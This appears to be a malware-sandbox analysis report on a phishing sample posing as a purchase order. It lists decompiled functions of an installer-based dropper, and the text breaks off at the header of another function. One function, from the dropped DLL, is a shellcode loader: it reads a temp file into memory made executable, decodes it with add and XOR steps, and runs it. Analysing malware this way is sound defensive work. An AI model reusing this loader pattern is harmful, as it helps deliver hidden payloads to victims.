                      • String ID: 80A
                      • API String ID: 2113905535-195308239
                      • Opcode ID: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
                      • Instruction ID: 41b23491bffeaa1753be022b97a7ffae9df7beca0cc47644b0b6bde15745b2e9
                      • Opcode Fuzzy Hash: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
                      • Instruction Fuzzy Hash: 91310B31901209EFDF21CF55DE84DAE7BB8EB453A5F20403AF504E61E0D2749E41EB69
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040302C, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108fileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 415 40302c-403055 GetTickCount 416 403196-40319e call 402bc5 415->416 417 40305b-403086 call 4031da SetFilePointer 415->417 422 4031a0-4031a5 416->422 423 40308b-40309d 417->423 424 4030a1-4030af call 4031a8 423->424 425 40309f 423->425 428 4030b5-4030c1 424->428 429 403188-40318b 424->429 425->424 430 4030c7-4030cd 428->430 429->422 431 4030f8-403114 call 405e9d 430->431 432 4030cf-4030d5 430->432 438 403191 431->438 439 403116-40311e 431->439 432->431 433 4030d7-4030f7 call 402bc5 432->433 433->431 440 403193-403194 438->440 441 403120-403136 WriteFile 439->441 442 403152-403158 439->442 440->422 444 403138-40313c 441->444 445 40318d-40318f 441->445 442->438 443 40315a-40315c 442->443 443->438 446 40315e-403171 443->446 444->445 447 40313e-40314a 444->447 445->440 446->423 448 403177-403186 SetFilePointer 446->448 447->430 449 403150 447->449 448->416 449->446
                      C-Code - Quality: 94%
                      			E0040302C(intOrPtr _a4) {
				long _v4;
				void* __ecx;
				intOrPtr _t12;
				intOrPtr _t13;
				signed int _t14;
				void* _t16;
				void* _t17;
				long _t18;
				int _t21;
				intOrPtr _t22;
				intOrPtr _t34;
				long _t35;
				intOrPtr _t37;
				void* _t39;
				long _t40;
				intOrPtr _t53;

				_t35 =  *0x41703c; // 0x3f276
				_t37 = _t35 -  *0x40afa8 + _a4;
				 *0x423eac = GetTickCount() + 0x1f4;
				if(_t37 <= 0) {
					L23:
					E00402BC5(1);
					return 0;
				}
				E004031DA( *0x41f04c);
				SetFilePointer( *0x409014,  *0x40afa8, 0, 0); // executed
				 *0x41f048 = _t37;
				 *0x417038 = 0;
				while(1) {
					_t12 =  *0x417040; // 0x3c4e3
					_t34 = 0x4000;
					_t13 = _t12 -  *0x41f04c;
					if(_t13 <= 0x4000) {
						_t34 = _t13;
					}
					_t14 = E004031A8(0x413038, _t34); // executed
					if(_t14 == 0) {
						break;
					}
					 *0x41f04c =  *0x41f04c + _t34;
					 *0x40afc8 = 0x413038;
					 *0x40afcc = _t34;
					L6:
					L6:
					if( *0x423eb0 != 0 &&  *0x423f40 == 0) {
						_t22 =  *0x41f048; // 0x32abc
						 *0x417038 = _t22 -  *0x41703c - _a4 +  *0x40afa8;
						E00402BC5(0);
					}
					 *0x40afd0 = 0x40b038;
					 *0x40afd4 = 0x8000; // executed
					_t16 = E00405E9D(0x40afb0); // executed
					if(_t16 < 0) {
						goto L21;
					}
					_t39 =  *0x40afd0; // 0x40ef76
					_t40 = _t39 - 0x40b038;
					if(_t40 == 0) {
						__eflags =  *0x40afcc; // 0x0
						if(__eflags != 0) {
							goto L21;
						}
						__eflags = _t34;
						if(_t34 == 0) {
							goto L21;
						}
						L17:
						_t18 =  *0x41703c; // 0x3f276
						if(_t18 -  *0x40afa8 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x409014, _t18, 0, 0); // executed
						goto L23;
					}
					_t21 = WriteFile( *0x409014, 0x40b038, _t40,  &_v4, 0); // executed
					if(_t21 == 0 || _t40 != _v4) {
						_push(0xfffffffe);
						L22:
						_pop(_t17);
						return _t17;
					} else {
						 *0x40afa8 =  *0x40afa8 + _t40;
						_t53 =  *0x40afcc; // 0x0
						if(_t53 != 0) {
							goto L6;
						}
						goto L17;
					}
					L21:
					_push(0xfffffffd);
					goto L22;
				}
				return _t14 | 0xffffffff;
			}



















                      0x00403030
                      0x0040303d
                      0x00403050
                      0x00403055
                      0x00403196
                      0x00403198
                      0x00000000
                      0x0040319e
                      0x00403061
                      0x00403074
                      0x0040307a
                      0x00403080
                      0x0040308b
                      0x0040308b
                      0x00403090
                      0x00403095
                      0x0040309d
                      0x0040309f
                      0x0040309f
                      0x004030a8
                      0x004030af
                      0x00000000
                      0x00000000
                      0x004030b5
                      0x004030bb
                      0x004030c1
                      0x00000000
                      0x004030c7
                      0x004030cd
                      0x004030d7
                      0x004030ed
                      0x004030f2
                      0x004030f7
                      0x004030fd
                      0x00403103
                      0x0040310d
                      0x00403114
                      0x00000000
                      0x00000000
                      0x00403116
                      0x0040311c
                      0x0040311e
                      0x00403152
                      0x00403158
                      0x00000000
                      0x00000000
                      0x0040315a
                      0x0040315c
                      0x00000000
                      0x00000000
                      0x0040315e
                      0x0040315e
                      0x00403171
                      0x00000000
                      0x00000000
                      0x00403180
                      0x00000000
                      0x00403180
                      0x0040312e
                      0x00403136
                      0x0040318d
                      0x00403193
                      0x00403193
                      0x00000000
                      0x0040313e
                      0x0040313e
                      0x00403144
                      0x0040314a
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00403150
                      0x00403191
                      0x00403191
                      0x00000000
                      0x00403191
                      0x00000000

                      APIs
                      • GetTickCount.KERNEL32 ref: 00403041
                        • Part of subcall function 004031DA: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,?), ref: 004031E8
                      • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000), ref: 00403074
                      • WriteFile.KERNELBASE(0040B038,0040EF76,00000000,00000000,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?), ref: 0040312E
                      • SetFilePointer.KERNELBASE(0003F276,00000000,00000000,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?), ref: 00403180
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: File$Pointer$CountTickWrite
                      • String ID: 80A$v@
                      • API String ID: 2146148272-2572644541
                      • Opcode ID: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
                      • Instruction ID: 8653c145dc750015188d6a9afa30315cb9c5a6a6900809742879fa1bd1138a56
                      • Opcode Fuzzy Hash: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
                      • Instruction Fuzzy Hash: 74417FB2504302AFD7109F19EE8496A3FBCF748396710813BE511B62F1C7386A559BAE
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00401F51, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69libraryloaderCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 450 401f51-401f5d 451 401f63-401f79 call 4029e8 * 2 450->451 452 40200b-40200d 450->452 462 401f88-401f96 LoadLibraryExA 451->462 463 401f7b-401f86 GetModuleHandleA 451->463 454 402156-40215b call 401423 452->454 459 40287d-40288c 454->459 465 401f98-401fa6 GetProcAddress 462->465 466 402004-402006 462->466 463->462 463->465 467 401fe5-401fea call 404e23 465->467 468 401fa8-401fae 465->468 466->454 472 401fef-401ff2 467->472 470 401fb0-401fbc call 401423 468->470 471 401fc7-401fde call 72b210a0 468->471 470->472 478 401fbe-401fc5 470->478 475 401fe0-401fe3 471->475 472->459 476 401ff8-401fff FreeLibrary 472->476 475->472 476->459 478->472
                      C-Code - Quality: 57%
                      			E00401F51(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t25;
				void* _t26;
				struct HINSTANCE__* _t29;
				CHAR* _t31;
				intOrPtr* _t32;
				void* _t33;

				_t26 = __ebx;
				asm("sbb eax, 0x423f58");
				 *(_t33 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L14:
					E00401423();
					L15:
					 *0x423f28 =  *0x423f28 +  *(_t33 - 4);
					return 0;
				}
				_t31 = E004029E8(0xfffffff0);
				 *(_t33 + 8) = E004029E8(1);
				if( *((intOrPtr*)(_t33 - 0x14)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t31, _t26, 8); // executed
					_t29 = _t18;
					if(_t29 == _t26) {
						_push(0xfffffff6);
						goto L14;
					}
					L4:
					_t32 = GetProcAddress(_t29,  *(_t33 + 8));
					if(_t32 == _t26) {
						E00404E23(0xfffffff7,  *(_t33 + 8));
					} else {
						 *(_t33 - 4) = _t26;
						if( *((intOrPtr*)(_t33 - 0x1c)) == _t26) {
							 *_t32( *((intOrPtr*)(_t33 - 0x34)), 0x400, 0x424000, 0x40af68, " ?B"); // executed
						} else {
							E00401423( *((intOrPtr*)(_t33 - 0x1c)));
							if( *_t32() != 0) {
								 *(_t33 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t33 - 0x18)) == _t26) {
						FreeLibrary(_t29);
					}
					goto L15;
				}
				_t25 = GetModuleHandleA(_t31); // executed
				_t29 = _t25;
				if(_t29 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                      0x00401f51
                      0x00401f51
                      0x00401f56
                      0x00401f5d
                      0x0040200b
                      0x00402156
                      0x00402156
                      0x0040287d
                      0x00402880
                      0x0040288c
                      0x0040288c
                      0x00401f6c
                      0x00401f76
                      0x00401f79
                      0x00401f88
                      0x00401f8c
                      0x00401f92
                      0x00401f96
                      0x00402004
                      0x00000000
                      0x00402004
                      0x00401f98
                      0x00401fa2
                      0x00401fa6
                      0x00401fea
                      0x00401fa8
                      0x00401fab
                      0x00401fae
                      0x00401fde
                      0x00401fb0
                      0x00401fb3
                      0x00401fbc
                      0x00401fbe
                      0x00401fbe
                      0x00401fbc
                      0x00401fae
                      0x00401ff2
                      0x00401ff9
                      0x00401ff9
                      0x00000000
                      0x00401ff2
                      0x00401f7c
                      0x00401f82
                      0x00401f86
                      0x00000000
                      0x00000000
                      0x00000000

                      APIs
                      • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F7C
                        • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                        • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                        • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                        • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                        • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EB7
                        • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404ED1
                        • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EDF
                      • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
                      • GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
                      • FreeLibrary.KERNEL32(00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00401FF9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                      • String ID: ?B
                      • API String ID: 2987980305-117478770
                      • Opcode ID: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
                      • Instruction ID: 6286e611532d8822c51d7e946ff34bbadf458e6cc54079b264412ac530ebcb8a
                      • Opcode Fuzzy Hash: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
                      • Instruction Fuzzy Hash: 9611E772D04216EBCF107FA4DE89EAE75B0AB44359F20423BF611B62E0C77C8941DA5E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004015B3, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 480 4015b3-4015c6 call 4029e8 call 40560c 485 4015c8-4015e3 call 4055a3 CreateDirectoryA 480->485 486 40160a-40160d 480->486 493 401600-401608 485->493 494 4015e5-4015f0 GetLastError 485->494 488 40162d-40215b call 401423 486->488 489 40160f-401628 call 401423 call 405a85 SetCurrentDirectoryA 486->489 501 40287d-40288c 488->501 489->501 493->485 493->486 497 4015f2-4015fb GetFileAttributesA 494->497 498 4015fd 494->498 497->493 497->498 498->493
                      C-Code - Quality: 85%
                      			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
				struct _SECURITY_ATTRIBUTES** _t10;
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E004029E8(0xfffffff0);
				_t10 = E0040560C(_t25);
				_t27 = _t10;
				if(_t10 != __ebx) {
					do {
						_t29 = E004055A3(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L4:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L4;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405A85("C:\\Users\\jones\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}











                      0x004015b3
                      0x004015ba
                      0x004015bd
                      0x004015c2
                      0x004015c6
                      0x004015c8
                      0x004015d0
                      0x004015d6
                      0x004015d8
                      0x004015db
                      0x004015e3
                      0x004015f0
                      0x004015fd
                      0x004015fd
                      0x004015f2
                      0x004015f3
                      0x004015fb
                      0x00000000
                      0x00000000
                      0x004015fb
                      0x004015f0
                      0x00401600
                      0x00401603
                      0x00401605
                      0x00401606
                      0x004015c8
                      0x0040160d
                      0x0040162d
                      0x00402156
                      0x0040160f
                      0x00401611
                      0x0040161c
                      0x00401622
                      0x00401622
                      0x00402880
                      0x0040288c

                      APIs
                        • Part of subcall function 0040560C: CharNextA.USER32(004053BE,?,004218A0,00000000,00405670,004218A0,004218A0,?,?,73BCF560,004053BE,?,"C:\Users\user\Desktop\Purchase Order #5000012803.exe" ,73BCF560), ref: 0040561A
                        • Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040561F
                        • Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040562E
                      • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                      • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                      • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                      • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622
                      Strings
                      • C:\Users\user\AppData\Local\Temp, xrefs: 00401617
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                      • String ID: C:\Users\user\AppData\Local\Temp
                      • API String ID: 3751793516-47812868
                      • Opcode ID: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
                      • Instruction ID: 11ba4fe5436512bc7837d50811c3794abd92905400bb47a2e3f09ad75438aea6
                      • Opcode Fuzzy Hash: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
                      • Instruction Fuzzy Hash: B3010431908150AFDB116FB51D44D7F67B0AA56365768073BF491B22E2C63C4942D62E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040578B, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 505 40578b-405795 506 405796-4057c0 GetTickCount GetTempFileNameA 505->506 507 4057c2-4057c4 506->507 508 4057cf-4057d1 506->508 507->506 509 4057c6 507->509 510 4057c9-4057cc 508->510 509->510
                      C-Code - Quality: 100%
                      			E0040578B(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                      0x0040578f
                      0x00405795
                      0x00405796
                      0x00405796
                      0x00405797
                      0x0040579e
                      0x004057a8
                      0x004057b5
                      0x004057b8
                      0x004057c0
                      0x00000000
                      0x00000000
                      0x004057c4
                      0x00000000
                      0x00000000
                      0x004057c6
                      0x00000000
                      0x004057c6
                      0x00000000

                      APIs
                      • GetTickCount.KERNEL32 ref: 0040579E
                      • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 004057B8
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: CountFileNameTempTick
                      • String ID: "C:\Users\user\Desktop\Purchase Order #5000012803.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                      • API String ID: 1716503409-3227440334
                      • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                      • Instruction ID: 4fcdc00fff711095840056c8ed2a58f2bfde19b521d5dac465ae6a1bf3f6778c
                      • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                      • Instruction Fuzzy Hash: F9F0A736348304B6D7104E55DC04B9B7F69DF91750F14C02BFA449B1C0D6B0995497A5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 72B210A0, Relevance: 6.1, APIs: 4, Instructions: 87filememoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      C-Code - Quality: 76%
                      			E72B210A0(void* __ecx, void* __eflags) {
				short _v6;
				short _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				char _v24;
				void* _v28;
				long _v32;
				long _v36;
				short _v1076;
				void _v6048;
				void* _t37;
				intOrPtr _t40;
				struct _OVERLAPPED* _t63;
				void* _t72;

				E72B21000(0x179c, __ecx);
				_v24 = 0x75;
				_v22 = 0x72;
				_v20 = 0x70;
				_v18 = 0x77;
				_v16 = 0x76;
				_v14 = 0x71;
				_v12 = 0x61;
				_v10 = 0x6e;
				_v8 = 0x65;
				_v6 = 0;
				GetTempPathW(0x103,  &_v1076);
				E72B21030( &_v1076,  &_v24);
				VirtualProtect( &_v6048, 0x136c, 0x40,  &_v32); // executed
				_t37 = CreateFileW( &_v1076, 0x80000000, 7, 0, 3, 0x80, 0); // executed
				_v28 = _t37;
				ReadFile(_v28,  &_v6048, 0x136c,  &_v36, 0); // executed
				_t63 = 0;
				while(1) {
					_t40 =  *((intOrPtr*)(_t72 + _t63 - 0x179c));
					if(_t63 == 0x136c) {
						break;
					}
					 *((char*)(_t72 + _t63 - 0x179c)) = ((_t40 + 0x000000bc - 0x77 + 0x00000035 ^ 0x00000026) + 0x18 - 0x00000001 ^ 0xd) + 1;
					_t63 =  &(_t63->Internal);
				}
				_v6048();
				return 0;
			}






















                      0x72b210a8
                      0x72b210b2
                      0x72b210bb
                      0x72b210c4
                      0x72b210cd
                      0x72b210d6
                      0x72b210df
                      0x72b210e8
                      0x72b210f1
                      0x72b210fa
                      0x72b21100
                      0x72b21110
                      0x72b21121
                      0x72b2113b
                      0x72b2115a
                      0x72b21160
                      0x72b21179
                      0x72b2117f
                      0x72b21184
                      0x72b21184
                      0x72b21191
                      0x00000000
                      0x00000000
                      0x72b211ab
                      0x72b211b2
                      0x72b211b2
                      0x72b211c4
                      0x72b211cb

                      APIs
                      • GetTempPathW.KERNEL32(00000103,?), ref: 72B21110
                      • VirtualProtect.KERNELBASE(?,0000136C,00000040,?), ref: 72B2113B
                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 72B2115A
                      • ReadFile.KERNELBASE(?,?,0000136C,?,00000000), ref: 72B21179
                      Memory Dump Source
                      • Source File: 00000000.00000002.669744358.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
                      • Associated: 00000000.00000002.669677900.0000000072B20000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.669787017.0000000072B22000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72b20000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: File$CreatePathProtectReadTempVirtual
                      • String ID:
                      • API String ID: 205760209-0
                      • Opcode ID: 8b22f4feae5e9199703f48bfffb923399f9d5aa40d135a9bc99108c85cd04cb8
                      • Instruction ID: 2490afb1df682ba7bedcfc9e46f100d7db75bd107592a289f7c1b85abc8470e8
                      • Opcode Fuzzy Hash: 8b22f4feae5e9199703f48bfffb923399f9d5aa40d135a9bc99108c85cd04cb8
                      • Instruction Fuzzy Hash: 2431BF75924308ABEB10DBA4CC15BEE7375EF54700F10A468E20DE76D0E6B96B05CB65
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004031F1, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                      Download Yara Rule

                      Control-flow Graph

                      C-Code - Quality: 84%
                      			E004031F1(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
				E00405CE3(_t6);
				_t2 = E004055E5(_t6);
				if(_t2 != 0) {
					E00405578(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E0040578B("1033", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}






                      0x004031f2
                      0x004031f8
                      0x004031fe
                      0x00403205
                      0x0040320a
                      0x00403212
                      0x0040321e
                      0x00403224
                      0x00403208
                      0x00403208
                      0x00403208

                      APIs
                        • Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Purchase Order #5000012803.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
                        • Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D48
                        • Part of subcall function 00405CE3: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Purchase Order #5000012803.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
                        • Part of subcall function 00405CE3: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\Purchase Order #5000012803.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D
                      • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00403212
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: Char$Next$CreateDirectoryPrev
                      • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                      • API String ID: 4115351271-517883005
                      • Opcode ID: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
                      • Instruction ID: 52f5018bb87fe832e559484150a565c10a299960058697363e648776ae6da385
                      • Opcode Fuzzy Hash: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
                      • Instruction Fuzzy Hash: 68D0C92164AD3036D551372A3D0AFDF090D9F4272EF21417BF804B50CA5B6C6A8319EF
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00406481, Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
